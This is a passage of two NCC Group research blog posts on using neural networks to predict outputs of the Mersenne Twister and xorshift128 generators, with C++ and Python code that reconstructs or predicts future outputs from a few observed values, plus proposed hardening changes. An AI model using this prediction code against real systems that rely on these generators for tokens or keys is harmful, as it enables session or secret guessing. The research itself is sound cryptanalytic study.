0 24   [1, 8, 12, 19, 26, 30]
0 25   []
0 26   []
0 27   [1, 8, 12, 19, 26, 30]
0 28   []
0 29   []
0 30   []
0 31   [1, 8, 12, 19, 26, 30]
1 0   [3, 5, 7, 9, 11, 14, 15, 16, 17, 18, 23, 25, 26, 27, 28, 29, 30, 31]
1 1   [0, 4, 7, 22]
1 2   [13, 16, 19, 26, 31]
1 3   [2, 6, 24]
1 4   [0, 3, 7, 10, 18, 25]
1 5   [4, 7, 8, 11, 25, 26]
1 6   [5, 9, 12, 27]
1 7   [5, 7, 9, 10, 11, 14, 15, 16, 17, 18, 21, 23, 25, 26, 27, 29, 30, 31]
1 8   [7, 11, 14, 29]
1 9   [1, 19, 26]
1 10   [9, 13, 31]
1 11   [2, 3, 5, 7, 9, 10, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 12   [7, 11, 25]
1 13   [1, 9, 12, 19, 27]
1 14   [2, 10, 13, 20, 28]
1 15   [3, 14, 21]
1 16   [1, 8, 12, 15, 19, 26, 30]
1 17   [1, 5, 8, 13, 16, 19, 23, 26, 31]
1 18   [3, 5, 6, 7, 9, 11, 14, 15, 16, 18, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 19   [4, 18, 22, 25]
1 20   [1, 13, 16, 26, 31]
1 21   [6, 20, 24]
1 22   [0, 2, 3, 5, 6, 9, 11, 13, 14, 15, 16, 17, 20, 21, 23, 26, 27, 29, 30, 31]
1 23   [7, 8, 11, 22, 25, 26]
1 24   [1, 8, 9, 12, 19, 23, 26, 27]
1 25   [5, 6, 7, 9, 10, 11, 13, 14, 15, 16, 17, 18, 21, 23, 24, 25, 26, 27, 29, 30]
1 26   [11, 14, 25, 29]
1 27   [1, 8, 19]
1 28   [13, 27, 31]
1 29   [2, 3, 5, 7, 9, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 29, 30, 31]
1 30   [7, 25, 29]
1 31   [8, 9, 12, 26, 27]
2 0   [0]
2 1   [1]
2 2   [2]
2 3   [3]
2 4   [4]
2 5   [5]
2 6   [6]
2 7   [7]
2 8   [8]
2 9   [9]
2 10   [10]
2 11   [11]
2 12   [12]
2 13   [13]
2 14   [14]
2 15   [15]
2 16   [16]
2 17   [17]
2 18   [18]
2 19   [19]
2 20   [20]
2 21   [21]
2 22   [22]
2 23   [23]
2 24   [24]
2 25   [25]
2 26   [26]
2 27   [27]
2 28   [28]
2 29   [29]
2 30   [30]
2 31   [31]

As we can see, each bit in the third input affects the same bit, in order, in the output. We can also notice that only 8 bits of the first input affect the output, all hitting the same 6 output bits. For the second input, however, each bit affects several output bits. Although we could write a closed-form logic expression for this, we will write code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

#include <cstdint>

using uint = uint32_t;  // the listing relies on a `uint` alias; define it for portability

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;
    
    r ^= MT_227;
    return r;
}

We have tested this code by using the standard MT library in C to generate a sequence of random numbers and matching the function's output against the next number generated by the library. The output matched 100% over several million generated numbers with different seeds.

3.2.4.3 Further Improvement

We have seen in the previous section that we can use three generated numbers to generate the next number in the sequence. But we noticed that we only need 8 bits from the first number: we XOR them together, and if the result is one, we XOR the output with the constant 0x44081102. Based on this observation, we can instead ignore the first number altogether and generate two candidate outputs, one with and one without the XOR by 0x44081102. Here is the code segment for the new function:

#include <cstdint>
#include <tuple>

using namespace std;
using uint = uint32_t;  // the listing relies on a `uint` alias; define it for portability

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    r ^= MT_227;
    return make_tuple(r, r^0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm and use only two or three numbers to predict the following number in the sequence. In this section, we will discuss two issues with the MT algorithm and how to address them. Studying these issues can be particularly useful when MT is used as part of a cryptographically-secure PRNG, like in CryptMT. CryptMT uses the Mersenne Twister internally, and it was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito [2].

4.1 Normalizing the Runtime

As we described in Section 2, MT consists of two steps, twisting and tempering. Although the tempering step is applied at every call, the twisting step only runs when we have exhausted all the states and need to twist the state array into a new internal state. That is fine algorithmically, but from a security point of view it is problematic: it makes the algorithm vulnerable to a timing side-channel attack. By monitoring the runtime of each generated number, an attacker can determine when the state is being twisted, since those calls take much longer, and can thereby guess the start of a new state. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, an attacker can easily determine the start of the state twisting by setting a threshold (here about 0.4 ms) on the generation time. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number, using the progressive formula we derived earlier. Using this approach, we have updated the code for MT, measured the runtime again, and here is the result:

We can see that the runtime of the algorithm is now uniform across all iterations. Of course, we checked the output of both MT implementations, and they produce the exact same sequence. Also, when we measured the mean runtime of both implementations over millions of generated numbers, the new approach is slightly more efficient and has a much smaller standard deviation.

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning model that correlates a generated output with three previous outputs. In this section, we suggest a slight change to the algorithm to overcome this weakness: apply the twisting step to the old state all at once and generate the new state from it. This can be achieved by performing the twist into a new state array and swapping it with the old one after all states are twisted. State prediction becomes more complex because different positions use different distances when evaluating the new state: new states 0 to 226 use old states 397 to 623 (397 apart), while new states 227 to 623 use old states 0 to 396 (227 apart). Since an attacker does not know whether a generated number comes from the first 227 or the last 397 positions of the state, any output can be either 227 or 397 away from the outputs it depends on, making the PRNG more resilient to the attack suggested above. Although this produces a different sequence, predicting the new state from the old ones becomes harder. Of course, this suggestion needs deeper review to check the other properties of the resulting PRNG, such as its period.

5. Conclusion

In this series of posts, we have shared the methodology for cracking two well-known (non-cryptographic) pseudo-random number generators, namely xorshift128 and the Mersenne Twister. In the first post, we showed how a simple machine learning model can learn the internal pattern in the sequence of generated numbers. In this post, we extended that work to a more complex PRNG by splitting the problem into two simpler ones and training a separate NN model for each. We then used the two models together to predict the next number in the sequence from three generated numbers. We also showed how to deep dive into the models, understand how they work internally, and use them to create closed-form code that breaks the Mersenne Twister (MT) PRNG. Finally, we shared two possible techniques to improve the MT algorithm security-wise, as a means of thinking through algorithmic improvements based on patterns identified by deep learning (while recognizing that these changes alone do not make MT suitable where cryptographic randomness is required).

The Python code for training and testing the models outlined in this post is shared in this repo in the form of a Jupyter notebook. Please note that this code builds on top of an old version of the code shared in the post [3] and the changes made in part 1 of this post.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback, especially on the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012, Pages 209-238, ISBN 9781597499514, https://doi.org/10.1016/B978-1-59-749951-4.00007-2.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

✇ NCC Group Research

Cracking Random Number Generators using Machine Learning – Part 1: xorshift128

By: Mostafa Hassan

Outline

1. Introduction

This blog post proposes an approach to crack Pseudo-Random Number Generators (PRNGs) using machine learning. By cracking, we mean that we can predict the sequence of random numbers using previously generated numbers, without knowledge of the seed. We started by breaking a simple PRNG, namely xorshift128, following the lead of the post published in [1]. We simplified the structure of the neural network model from the one proposed in that post and achieved higher accuracy. This post aims to show how to train a machine learning model that reaches 100% accuracy in predicting the generated numbers without knowing the seed, and then deep dives into the trained model to show how it works and to extract useful information from it.

In the mentioned blog post [1], the author replicated the xorshift128 PRNG sequence with high accuracy without having the PRNG seed using a deep learning model. After training, the model can use any consecutive four generated numbers to replicate the same sequence of the PRNG with bitwise accuracy greater than 95%. The details of this experiment’s implementation and the best-trained model can be found in [2]

At first glance, this seemed a bit counter-intuitive, as the whole idea behind machine learning algorithms is to learn from patterns in data to perform a specific task, whether through supervised, unsupervised, or reinforcement learning. Pseudo-random number generators, on the other hand, are meant to generate sequences that do not follow any pattern. So, at first, it did not make sense to train an ML model, which learns patterns from data, on a PRNG whose output should not follow any pattern. Yet the model not only learned, but reached 95% bitwise accuracy, which means it generates the PRNG's exact output and only gets, on average, two bits wrong per number. So, how is this possible? Why can machine learning crack the PRNG? Can we do even better than 95% bitwise accuracy? That is what we are going to discuss in the rest of this article. Let's start by examining the xorshift128 algorithm.

** Editor’s Note: How does this relate to security? While this research looks at a non-cryptographic PRNG, we are interested, generically, in understanding how deep learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use deep learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space. **

2. How does xorshift128 PRNG work?

To understand whether machine learning (ML) can crack the xorshift128 PRNG, we need to comprehend how it works and check whether it follows any patterns. Let's start by digging into the implementation of the xorshift128 algorithm. The code for this algorithm can be found on Wikipedia and is shared in [2]. Here is the function used in the repo to generate the PRNG sequence (which is used to train the ML model):

def xorshift128():
    '''xorshift
    https://ja.wikipedia.org/wiki/Xorshift
    '''

    x = 123456789
    y = 362436069
    z = 521288629
    w = 88675123

    def _random():
        nonlocal x, y, z, w
        t = x ^ ((x << 11) & 0xFFFFFFFF)  # 32bit
        x, y, z = y, z, w
        w = (w ^ (w >> 19)) ^ (t ^ (t >> 8))
        return w

    return _random

As we can see from the code, the implementation is straightforward. It has four internal numbers, x, y, z, and w, representing both the seed and the state of the PRNG. Of course, we could update this implementation to accept the seed via a function call instead of hardcoding it. Every time we call the generator, it shifts the internal variables as follows: y → x, z → y, and w → z. The new value of w is evaluated by applying some bit manipulations (shifts and XORs) to the old values of x and w, and is returned as the new random number output of the generator. Let's call the function output o.

Using this code, we can derive the logical expression of each bit of the output, which leads us to the following output bits representations of the output, o:

O0 = W0 ^ W19 ^ X0 ^ X8

O1 = W1 ^ W20 ^ X1 ^ X9

.

.

O31 = W31 ^ X20 ^ X31

where Oi is the ith bit of the output, and the sign ^ is a bitwise XOR. The schematic diagram of this algorithm is shown below:

We can notice from this algorithm that we only need w and x to generate the next random number output. Of course, we need y and z to generate the random numbers afterward, but the value of o depends only on x and w.

So, after understanding the algorithm, we can see the simple relation between the last four generated numbers and the next one. Hence, if we know the last four numbers generated by this PRNG, we can use the algorithm to generate the whole sequence; this is the main reason why this algorithm is not cryptographically secure. Although the generated numbers seem to be random, with no clear relations between them, an attacker who knows the algorithm can predict the whole sequence of xorshift128 from any four consecutive generated numbers. As the purpose of this post is to show how an ML model can learn the hidden relations in a sample PRNG, we will assume that we only know there is some relation between a newly generated number and the previous four, without knowing the implementation of the algorithm.
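To make this concrete, here is a short sketch of such an attack (my own illustration; the helper name is not from [2]). Because each call shifts the state as y → x, z → y, and w → z, the internal state after any four consecutive outputs is exactly those four outputs, so an attacker can clone the generator directly:

```python
def xorshift128_from_state(x, y, z, w):
    """Same generator as above, but seeded with an explicit state."""
    def _random():
        nonlocal x, y, z, w
        t = x ^ ((x << 11) & 0xFFFFFFFF)  # 32-bit
        x, y, z = y, z, w
        w = (w ^ (w >> 19)) ^ (t ^ (t >> 8))
        return w
    return _random

victim = xorshift128_from_state(123456789, 362436069, 521288629, 88675123)
# The attacker observes any four consecutive outputs...
o1, o2, o3, o4 = victim(), victim(), victim(), victim()

# ...seeds a fresh generator with them (they are the victim's current state)...
attacker = xorshift128_from_state(o1, o2, o3, o4)

# ...and predicts the victim's outputs perfectly from then on.
assert all(attacker() == victim() for _ in range(1000))
```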

Returning to the main question: can machine learning algorithms learn to generate the xorshift128 PRNG sequence without knowing its implementation, using only the last four inputs?

To answer this question, let’s first introduce the Artificial Neural Networks (ANN or NN for short) and how they may model the XOR gates.

3. Neural Networks and XOR gates

Neural Networks (NN), aka Multi-Layer Perceptrons (MLP), are among the most commonly used machine learning algorithms. They consist of small computing units, called neurons or perceptrons, organized into sets of neurons, called layers, with no connections within a layer. The layers are interconnected to form paths from the inputs of the NN to its outputs. The following figure shows a simple example of a two-layer NN (the input layer is not counted). The details of the mathematical formulation of NNs are out of the scope of this post.

While the NN is trained on the input data, the connections between the neurons, aka the weights, either get stronger (large positive or large negative values), representing a strong positive or negative connection between two neurons, or get weaker (close to 0), representing no connection at all. At the end of the training, these connections/weights encode the knowledge stored in the NN model.

One example used to describe how NNs handle nonlinear data is using an NN to model a two-input XOR gate. The main reason for choosing the two-input XOR function is that although it is simple, its outputs are not linearly separable [3]. Hence, an NN needs at least two layers to represent the two-input XOR gate. The following figure (from the Abhranil blog [3]) shows how a two-layer neural network can imitate a two-input XOR. The numbers on the lines are the weights, the numbers inside the nodes are the thresholds (negative biases), and a step activation function is assumed.

If we have more than two inputs to the XOR, we need to increase the number of nodes in the hidden layer (the layer in the middle) to make it possible to represent the other components of the XOR.
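As an illustration, here is a hand-wired two-layer network with step activations that computes XOR. The specific weights and thresholds below are my own illustrative choice (not necessarily those in the figure from [3]): one hidden node implements OR, the other AND, and the output fires when OR is true but AND is not, which is exactly XOR:

```python
import numpy as np

# Step activation: fires (1) when the weighted sum exceeds the threshold.
step = lambda v: (v > 0).astype(int)

W1 = np.array([[1, 1], [1, 1]])  # weights into the two hidden nodes
b1 = np.array([-0.5, -1.5])      # thresholds: node 1 acts as OR, node 2 as AND
W2 = np.array([1, -2])           # output fires for OR-but-not-AND
b2 = -0.5

def xor_nn(x1, x2):
    h = step(np.array([x1, x2]) @ W1 + b1)   # hidden layer: [OR, AND]
    return int(step(np.array([h @ W2 + b2]))[0])

for a in (0, 1):
    for b in (0, 1):
        assert xor_nn(a, b) == a ^ b
```

In training, gradient-based methods with smooth activations (e.g., relu or sigmoid) find an equivalent set of weights automatically; the hand-set values above just make the two-layer construction explicit.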

4. Using Neural Networks to model the xorshift128 PRNG

Based on what we discussed in the previous section and our understanding of how the xorshift128 PRNG algorithm works, it makes sense now that ML can learn the patterns the xorshift128 PRNG algorithm follows. We can also now decide how to structure the neural network model to replicate the xorshift128 PRNG algorithm. More specifically, we will use a dense neural network with only one hidden layer, as that is all we need to represent any set of XOR functions as implemented in the xorshift128 algorithm. Contrary to the model suggested in [1], we don’t see any reason to use a complex model like an LSTM (“Long short-term memory,” a type of recurrent neural network), especially since each output bit is directly connected to a set of input bits with XOR functions, as we have shown earlier, and there is no need to preserve internal state, as is done in the LSTM.

4.1 Neural Network Model Design 

Our proposed model has 128 inputs in the input layer, representing the last four generated integers at 32 bits each, and 32 outputs in the output layer, representing the next 32-bit random number. The main hyperparameter we need to decide is the number of neurons/nodes in the hidden layer. We don’t want too few nodes, which could not represent all the terms of the XOR functions, and at the same time we don’t want a vast number of nodes that would go unused, complicate the model, and increase the training time. In this case, based on the number of inputs and outputs and the complexity of the XOR functions, we made an educated guess and used 1024 nodes for the hidden layer. Hence, our neural network structure is as follows (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 1024)              132096    
_________________________________________________________________
dense_1 (Dense)              (None, 32)                32800     
=================================================================
Total params: 164,896
Trainable params: 164,896
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of parameters (weights and biases) of the hidden layer is 132,096 (128×1024 weights + 1024 biases), and the number of parameters of the output layer is 32,800 (1024×32 weights + 32 biases), for a total of 164,896 parameters to train. Compare this to the model used in [1]:

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
lstm (LSTM)                  (None, 1024)              4329472   
_________________________________________________________________
dense (Dense)                (None, 512)               524800    
_________________________________________________________________
dense_1 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_2 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_3 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_4 (Dense)              (None, 512)               262656    
_________________________________________________________________
dense_5 (Dense)              (None, 32)                16416     
=================================================================
Total params: 5,921,312
Trainable params: 5,921,312
Non-trainable params: 0
_________________________________________________________________

This complex model has around 6 million parameters to train, which makes training harder and much slower to reach good results. It could also easily get stuck in one of the local minima of that huge 6-million-dimension space. Additionally, storing this model and serving it later will use about 36 times the space needed to store/serve our model. Furthermore, the number of model parameters affects the amount of data required to train the model: the more parameters, the more input data is needed.
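These parameter counts are easy to verify by hand. The following quick arithmetic check (my own, matching the two summaries above) reproduces both totals:

```python
def dense_params(n_in, n_out):
    # A dense layer has n_in*n_out weights plus n_out biases.
    return n_in * n_out + n_out

# Our model: 128 -> 1024 -> 32.
ours = dense_params(128, 1024) + dense_params(1024, 32)
assert ours == 164_896

def lstm_params(n_in, units):
    # An LSTM has four gates, each with its own weights and biases.
    return 4 * ((n_in + units) * units + units)

# The model in [1]: LSTM(1024) over 32-bit inputs, then 512-unit dense layers.
theirs = (lstm_params(32, 1024)          # 4,329,472
          + dense_params(1024, 512)      # 524,800
          + 4 * dense_params(512, 512)   # 4 x 262,656
          + dense_params(512, 32))       # 16,416
assert theirs == 5_921_312
```

The ratio theirs/ours is about 36, which is where the storage-space factor above comes from.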

Another issue with that model is the loss function used. Our target is to get as many correct bits as possible; hence, the most suitable loss function in this case is “binary_crossentropy,” not “mse.” Without getting into the math of these two loss functions, it is sufficient to say that we don’t care whether the output is 0.8, 0.9, or even 100; all we care about is whether the value crosses some threshold, to be considered one, or not, to be considered zero. Another suboptimal parameter choice in that model is the activation function of the output layer. As the output layer comprises 32 neurons, each representing a bit whose value should always be 0 or 1, the most appropriate activation function for these nodes is usually a sigmoid. That model instead uses a linear activation function, which outputs any value from -inf to inf. Of course, we can threshold those values to convert them to zeros and ones, but training that model will be more challenging and take more time.

For the rest of the hyperparameters, we have used the same values as the model in [1]. We also used the same input sample as the other model, which consists of around 2 million random numbers sampled from the above PRNG function for training, and 10,000 random numbers for testing. The training and testing samples are formed into quadruples of consecutive random numbers to be used as inputs to the model, with the next random number used as the desired output. It is worth mentioning that we don’t think we need that amount of data to reach the performance we reached; we just tried to be consistent with the referenced article. Later, we can experiment to determine the minimum data size sufficient to produce a well-trained model. The following table summarizes the parameters/hyperparameters of our model in comparison with the model proposed in [1]:

                        NN Model in [1]            Our Model
Model Type              LSTM and Dense Network     Dense Network
#Layers                 7                          2
#Neurons                1024 LSTM + 2592 Dense     1056 Dense
#Trainable Parameters   5,921,312                  164,896
                        (4,329,472 from the
                        LSTM layer alone)
Activation Functions    Hidden Layers: relu        Hidden Layer: relu
                        Output Layer: linear       Output Layer: sigmoid
Loss Function           mse                        binary_crossentropy

Comparison between our proposed model and the model from the post in [1]

4.2 Model Results

After a few hours of model training and hyperparameter optimization, the NN model achieved 100% bitwise training accuracy! Of course, we ran the test set through the model, and we got the same result: 100% bitwise accuracy. To be more confident in what we achieved, we generated a new sample of 100,000 random numbers with a different seed than the one used to generate the previous data, and we got the same result of 100% bitwise accuracy. It is worth mentioning that the referenced article achieved 95%+ bitwise accuracy, which looks like a promising result. However, when we evaluated that model’s whole-number accuracy (versus bitwise accuracy), i.e., its ability to generate the exact next random number without any bits flipped, we found that its accuracy dropped to around 26%, compared to 100% for our model. The 95%+ bitwise accuracy does not mean failing on only about 2 bits, as it may appear (5% of 32 bits is less than 2 bits); rather, these 5% errors are scattered throughout 14 bits. In other words, although the referenced model has a bitwise accuracy of 95%+, only 18 bits are 100% correct, and on average, around 2 of the remaining 14 bits are altered by the model.
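The arithmetic behind this can be sketched as follows. This is a back-of-the-envelope estimate under a naive independence assumption across the noisy bits, not a reproduction of the measurement in [1]:

```python
bitwise_acc = 0.95
n_bits = 32
always_correct = 18  # bits the referenced model reportedly never gets wrong

# On average, 5% of 32 bits are wrong -- about 1.6 bits per number...
expected_wrong = (1 - bitwise_acc) * n_bits
assert round(expected_wrong, 1) == 1.6

# ...all concentrated in the remaining 14 "noisy" bits.
noisy = n_bits - always_correct
per_bit_acc = (bitwise_acc * n_bits - always_correct) / noisy  # ~0.886

# If those 14 bits were independent, the chance of an entirely correct
# 32-bit number would be roughly per_bit_acc ** 14 -- the same order of
# magnitude as the ~26% whole-number accuracy measured for that model.
whole_number_acc = per_bit_acc ** noisy
```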

The following table summarizes the two model comparisons:

                                   NN Model in [1]   Our Model
Bitwise Accuracy                   95%+              100%
Accuracy (whole numbers)           26%               100%
Bits that could be Flipped (/32)   14                0

Models accuracy comparison

In machine learning, getting 100% accuracy is usually not good news. It normally means either that we don’t have a good representation of the whole dataset, that we are overfitting the model to the sample data, or that the problem is so deterministic that it does not need machine learning. In our case, it is close to the third option. The xorshift128 PRNG algorithm is deterministic; the only unknown is which input bits are used to generate the output bits, as the function connecting them, XOR, is already known. So, in a way, this algorithm is easy for machine learning to crack. Getting a 100% accurate model thus means that the ML model has learned the bit-connection mappings between the input and output bits. So, given any four consecutive random numbers generated by this algorithm, the model will generate the exact same sequence of random numbers as the algorithm does, without knowing the seed.

4.3 Model Deep Dive

This section dives deeper into the model to understand what it has learned from the PRNG data and whether it matches our expectations.

4.3.1 Model First Layer Connections

As discussed in section 2, the xorshift128 PRNG uses the last four generated numbers to generate the new random number. More specifically, the implementation only uses the first and last of the four, called x and w, to generate the new random number, o. So, we want to check the weights that connect the 128 inputs (the last four generated numbers, concatenated) in the input layer to the 1024 hidden nodes of our trained model, to see how strongly they are connected, and hence verify which bits are used to generate the outputs. The following figure shows the value of the weights (y-axis) connecting each input (x-axis) to the 1024 hidden nodes. In other words, each dot on the graph represents the weight from one of the hidden nodes to one of the inputs:

As we can see, very few of the hidden nodes are strongly connected to any one of the inputs, with weights greater than ~2.5 or less than ~-2.5. The rest of the nodes, with low weights between -2 and 2, can be considered not connected. We can also notice that the inputs between bits 32 and 95 are not connected to any hidden nodes. This is because, as we stated earlier, the implementation of the xorshift128 PRNG uses only x (bits 0 to 31) and w (bits 96 to 127) from the inputs; the other two inputs, y and z, representing bits 32 to 95, are not used to generate the output, and that is exactly what the model has learned. This implies that the model learned this pattern accurately from the data given in the training phase.

4.3.2 Model Output Parsing

Similar to what we did in the previous section, the following figure shows the weights connecting each output (x-axis) to the 1024 hidden nodes of the hidden layer:

Like in our previous observation, each output bit is connected to only a very few nodes from the hidden layer, except perhaps bit 11, which is less decisive and may need more training to be less error-prone. What we want to examine now is how these output bits are connected to the input bits. We will explore only the first bit here, but the rest can be done the same way. If we focus only on bit 0 in the figure, we can see that it is connected to only five nodes from the hidden layer, two with positive weights and three with negative weights, as shown below:

Those connected hidden nodes are 120, 344, 395, 553, and 788. Although these nodes look random, if we plot their connection to the inputs, we get the following figure:

As we can see, very few bits affect those hidden nodes; we circled them in the figure. They are bits 0, 8, 96, and 115. If we take them modulo 32, we get bits 0 and 8 from the first number, x, and bits 0 and 19 from the fourth number, w. This matches the xorshift128 PRNG function we derived in section 2: the first bit of the output is the XOR of these bits, O0 = W0 ^ W19 ^ X0 ^ X8. We expect the five hidden nodes together with the one output node to resemble the functionality of an XOR of these four input bits. Hence, an ML model can learn the XOR function of any set of arbitrary input bits if given enough training data.

5. Creating a machine-learning-resistant version of xorshift128

After analyzing how the xorshift128 PRNG works and how NN can easily crack it, we can suggest a simple update to the algorithm, making it much harder to break using ML. The idea is to introduce another variable in the seed that will decide:

  1. Which variables to use out of x, y, z, and w to generate o.
  2. How many bits to shift each of these variables.
  3. Which direction to shift these variables, either left or right.

This can be binary encoded in less than 32 bits. For example, only the w and x variables generate the output in the sample code shown earlier, which can be binary encoded as 1001. The variable w is shifted 19 bits to the right, which can be binary encoded as 100111, where the least significant bit, 1, represents the right direction. The variable x is shifted 11 bits to the left, which can be binary encoded as 010110, where the least significant bit, 0, represents the left direction. This representation takes 4 bits + 4×6 bits = 28 bits. Of course, we need to make sure that the 4 bits that select the variables do not take the values 0000, 0001, 0010, 0100, or 1000, as they would select no variable, or only one, to XOR.
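A sketch of this encoding could look like the following. The helper name and field ordering are my own illustration, not a specification from this post; the field values match the shifts in the sample generator code (w shifted right by 19, x shifted left by 11):

```python
def encode_shift(amount, right):
    """6-bit field: 5 bits of shift amount, then 1 direction bit (1 = right)."""
    assert 0 <= amount < 32
    return (amount << 1) | right

# The sample code's choices: use w and x (mask 1001),
# shift w by 19 to the right, and x by 11 to the left.
var_mask = 0b1001
w_field = encode_shift(19, right=1)   # 0b100111
x_field = encode_shift(11, right=0)   # 0b010110

# Four 6-bit fields plus the 4-bit mask fit in 4 + 4*6 = 28 bits
# (unused variables y and z get zero fields here).
config = (var_mask << 24) | (w_field << 18) | (x_field << 12)
assert config.bit_length() <= 28

# Masks that select fewer than two variables must be rejected.
assert bin(var_mask).count("1") >= 2
```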

Using this simple update adds only a little complexity to the PRNG implementation, yet it means the ML model learns only one of about 16M different sequences that the same algorithm can generate with different seeds. It is as if the ML model had learned only the seed of the algorithm, not the algorithm itself. Please note that the purpose of this update is to make the algorithm more resilient to ML attacks; the other properties of the resulting PRNG, such as its periodicity, are yet to be studied.

6. Conclusion

This post discussed how the xorshift128 PRNG works and how to build a machine learning model that can learn from the PRNG’s “randomly” generated numbers to predict them with 100% accuracy. This means that if the ML model gets access to any four consecutive numbers generated from this PRNG, it can generate the exact sequence without access to the seed. We also studied how to design an NN model that best represents this PRNG. Here are some of the lessons learned from this post:

  1. Although the xorshift128 PRNG may appear to humans not to follow any pattern, machine learning can be used to predict the algorithm’s outputs, as the PRNG still follows a hidden pattern.
  2. Applying deep learning to predict PRNG output requires an understanding of the specific underlying algorithm’s design.
  3. It is not necessarily the case that large and complicated machine learning models attain higher accuracy than simple ones.
  4. Simple neural network (NN) models can easily learn the XOR function.

The Python code for training and testing the model outlined in this post is shared in this repo in the form of a Jupyter notebook. Please note that this code is based on an old version of the code shared in the post in [1], with the changes explained in this post. This was done intentionally to keep the data and other parameters unchanged, for a fair comparison.

Acknowledgment

I would like to thank my colleagues at NCC Group for their help and support and for giving valuable feedback, especially on the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Marie-Sarah Lacharite.

References

[1] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

[2] The repo with the code implementation for [1]

[3] https://blog.abhranil.net/2015/03/03/training-neural-networks-with-genetic-algorithms/
